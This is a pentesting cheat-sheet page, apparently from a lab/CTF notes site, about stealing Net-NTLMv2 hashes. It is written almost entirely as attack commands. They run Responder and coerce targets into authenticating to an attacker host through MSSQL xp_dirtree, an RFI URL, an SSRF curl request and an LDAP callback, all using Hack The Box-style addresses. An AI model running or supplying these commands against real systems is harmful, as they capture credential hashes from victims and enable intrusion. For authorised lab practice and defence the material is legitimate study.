Init NTLMv2 Theft

NTLM and Net-NTLMv2

Wait on your network.

sudo responder -I tun0 -dw -v

You may see Net-NTLMv2 hashes automatically.

Theft via SMB

See SMB Responder section.

Theft via Database

Kali> sudo responder -I tun0 -v

# Database with mssqlclient.py
SQL> EXEC sp_helprotect 'xp_dirtree' 
SQL> master.sys.xp_dirtree '\\10.10.14.54\any\thing' # Kali IP 

# Database with sqsh 
1> use master;                                                                                                                                                                       
2> EXEC sp_helprotect 'xp_dirtree';                                                                                                                                                  
3> go  

1> exec master.dbo.xp_dirtree '\\10.10.14.54\any\thing'   # Kali IP

Theft via HTTB

# Find a RFI vulnerability and then access to back to Kali
Kali> sudo responder -I tun0
Browser> http://school.flight.htb/index.php?view=//<Kali IP>/any/thing.txt

# Another example 
Kali> sudo responder -I tun0 -v
Kali> curl "http://192.168.206.165:8080/?url=http://192.168.49.206"

Theft via LDAP

Kali> sudo responder -I tun0

# Target Windows OS 
# Access to Ldap, triggering back to Kali
# ldap://<Kali IP>:389
Target system or service> ldap://10.10.14.114:389

PreviousSYSVOL and NETLOGON NextKerberos Quick Win

Last updated 2 years ago

hashtagWait on your network.

hashtagTheft via SMB

hashtagTheft via Database

hashtagTheft via HTTB

hashtagTheft via LDAP

Wait on your network.

Theft via SMB

Theft via Database

Theft via HTTB

Theft via LDAP